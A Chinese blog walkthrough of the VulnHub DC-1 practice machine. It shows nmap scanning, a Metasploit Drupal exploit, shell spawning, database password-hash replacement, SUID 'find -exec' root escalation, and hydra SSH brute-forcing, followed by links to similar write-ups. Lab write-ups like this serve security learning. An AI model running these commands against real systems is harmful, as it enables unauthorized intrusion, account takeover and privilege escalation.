DC-1靶机渗透

最新推荐文章于 2024-05-07 16:35:55 发布
最新推荐文章于 2024-05-07 16:35:55 发布
阅读量1.1k 收藏 2
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/124224041
版权

简介

靶机名称:DC1
下载地址:https://www.vulnhub.com/entry/dc-1-1,292/

一、信息收集

利用nmap扫描发现主机:

nmap -sP 192.168.229.0/24

在这里插入图片描述

获取主机为:192.168.229.180

收集主机端口和其它信息:

nmap -sS -sV -T5 -A -p- 192.168.229.180

在这里插入图片描述
在这里插入图片描述

发现开发22端口和80端口,并且运行在Linux上

二、漏洞查找

发现有80端口直接访问得到:

在这里插入图片描述

发现是cms是drupal,用msf看一下有没有可以利用的

在这里插入图片描述

这里我用序号为2的:

在这里插入图片描述
在用命令:options
查看需要设置的参数:

在这里插入图片描述

需要设置rhosts:

set rhosts 192.168.229.180

在这里插入图片描述

然后run

然后就获得了meterpreter。
输入shell,获得交互式shell

在这里插入图片描述

可以用python达到一个交互效果:

python -c 'import pty; pty.spawn("/bin/bash")'

得到:
在这里插入图片描述
查找到第一个flag:

在这里插入图片描述

提权

根据第一个flag提示去寻找cms的cinfig file

并且Drupal的默认配置文件为 /var/www/sites/default/settings.php,查看

查看一下:

在这里插入图片描述

得到第二个flag

发现了flag2和数据库的账号密码,flag2提示,提升权限为root来查看敏感文件,或者直接爆破

我们先进入数据库查看

在这里插入图片描述

查看数据:
在这里插入图片描述

在这里插入图片描述

选则users表查看用户信息:

在这里插入图片描述
发现有个admin用户但不知道密码:

可以参考这篇博客置换密码:
https://drupalchina.cn/node/2128

在drupal目录站点敲入以下命令:

php scripts/password-hash.sh admin

在这里插入图片描述

然后在user表中将密码替换为上面hash后面的值:

update users set pass="$S$DZOvssEYtKnlk5jLGjdReDQJyO.y36sNqH5uX/S/2rGOEsw32Ju4";

在这里插入图片描述
这样admin的密码就被改成admin

在drupal网站登录看看:

在这里插入图片描述
登录成功

发现flag3:

在这里插入图片描述

flag3提示,提权并提示 -exec,想到suid提权 find 命令

使用命令查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null

在这里插入图片描述

使用命令测试,发现为root权限

在这里插入图片描述

利用/bin/sh命令到达root的shell交互:

find / -name 666 -exec "/bin/sh" \;

在这里插入图片描述

获取最终flag

至此,完成渗透。此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,

在这里插入图片描述我们可以使用 hydra 进行爆破

hydra -l flag4 -P pass.txt ssh://192.168.229.180

在这里插入图片描述

连接:

在这里插入图片描述
参考连接:
https://blog.csdn.net/Auuuuuuuu/article/details/97832336

南冥~
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2765
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
DC-1靶机渗透学习
里丘~班诺的小屋
08-31 2133
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.131(未知) 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 二、战前准备 要求:攻击机和靶机在同一网段下,使用NAT模式 1、找到kali的IP地址,用nmap扫描同一网段找到靶机的IP 一般扫描出来的在中间而129是kali的,所以可以确定的是靶机的地址是192.168...
[Vulnhub靶机] DC-1
最新发布
haosha。的博客
05-07 3980
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
【vulnhub靶场】-dc1
weixin_43446292的博客
04-13 330
1、环境配置: kali:88.16.153.33 dc1:88.16.153.36 补充:kali需设为桥接模式,因为dc靶机打开需要登录,kali设为桥接模式后与dc1在同一个局域网内,可以在kali中扫描得知dc1的ip地址;dc1的下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 需要找到5个flag.txt 2、信息收集: 2.1 使用arp-scan -l,探测存活主机,也可使用nmap 88.16.153.33/24(较慢) 2.使用nmap查询开
靶机DC-1 WP
m0_66638011的博客
05-11 1285
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
DC靶场系列--DC1
BGiscool的博客
06-28 4657
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC1-靶机详解
TonyChaoWei的博客
02-06 1583
DC系列靶机渗透实战 提权
记录一下 DC1靶机渗透
吃醋不爱蘸饺子的胡诌乱造
01-12 520
一.准备 首先kaili攻击机和DC1靶机都是桥接网络,为了nmap扫描(桥接网络在设置里)。 二.namp扫描 1.首先扫描一下这个网段 很容易可以看见DC1的靶机的ip地址192.168.1.108(这个当时扫了半天都没有扫到,我在nat网络和桥接里反复横跳,最终还是它自己好了(充分证明了当你做不出来,可以歇一歇然后自己就好了。猜测是网络切换需要一定的时间) 2.扫描这个ip地址开放的端口 可以看出来这里开放了80端口,我们可以看一下! 然后就是上图这个样子! 三.开始渗透 典型的drupal(我
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1147
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
Vulnhub靶场渗透测试系列DC-1(Drupal漏洞)
qq_45722813的博客
11-14 4446
Vulnhub渗透测试系列-DC-1 靶机下载 地址:https://www.vulnhub.com/entry/dc-1,292/ 攻击机使用kali2021的VMware虚拟机,IP地址:192.168.172.131 在VMware中导入靶机,中间可能出现这个问题,直接点击【重试】 导入之后将网络模式设置为NAT模式 开启靶机虚拟机过程出现下面这个,点击【是】或【否】都可 虚拟机已开启 在kali攻击机中使用命令nmap -Pn 192.168.172.1/24扫描,进行主机发现,获取靶机的IP地址,
靶机-DC1通关全过程
认真走好每一小步
06-18 201
find / -perm -4000 2>/dev/null find搜索,/根下 -perm 查权限 4000代表root权限,使用此条命令可以看到以下命令临时具有管理员权限。pty.spawn("/bin/bash")' 没有通道,调用模块pty终端的模块,pty.spawn的属性。nmap -sP 192.168.153.0/24 (-sP 快速扫描ip)#认真走好每一小步 请多指教。RHOST 是设置被攻击者ip。LHOST 是设置攻击者ip。LPORT 自行设置端口。
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2710
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
靶机DC-1攻略
weixin_43179779的博客
10-07 1116
dc-1靶机靶机攻略
DC系列:dc-1(渗透过程)
2401_82463993的博客
03-13 1225
(meterpreter它是一种轻量级的后门程序,可用于远程访问受攻击系统,执行各种操作和操纵受感染的主机。还有一个名为drupaldb的数据库,然后我们登录一下这个数据库,查看其中的内容。通过该模块,攻击者可以利用漏洞执行远程命令,进而控制受影响的Drupal网站。表中用户名的密码是加密的,数据库大部分加密方式是cmd5加密方式。这边可以看到靶机的22 80 111和51771端口是开放的。username(用户名)=dbuser(数据库用户名)想让我们找到一个find的文件,可能是最后一个flag。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值